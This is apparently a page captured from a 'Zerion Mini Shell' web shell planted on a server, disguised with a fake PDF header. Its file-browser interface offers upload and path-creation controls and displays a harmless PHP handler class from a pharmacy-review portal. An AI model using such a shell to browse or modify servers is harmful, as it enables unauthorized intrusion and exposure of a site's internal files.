%PDF- %PDF-
Mini Shell

Mini Shell

Direktori : /var/www/html/bbw/farmaci/kritik-portale/module/Application/src/Application/Handler/
Upload File :
Create Path :
Current File : /var/www/html/bbw/farmaci/kritik-portale/module/Application/src/Application/Handler/GottHandler.php

<?php
/**
 * Created by PhpStorm.
 * User: juliangilles
 * Date: 05.09.14
 * Time: 12:30
 */

namespace Application\Handler;


use Basis\Handler\BaseHandler;
use Basis\Handler\HandlerInterface;

class GottHandler extends BaseHandler implements HandlerInterface{
    public function __construct()
    {
        // Entity
        $this->setEntityType("Basis\Entity\UserEntity");

        // listening
       // $this->addEvent("Basis\Event\User\UserChangeEmail", "changeEmail");
       // $this->addEvent("Basis\Event\User\UserChangePassword", "changePassword");
    }

} 

Zerion Mini Shell 1.0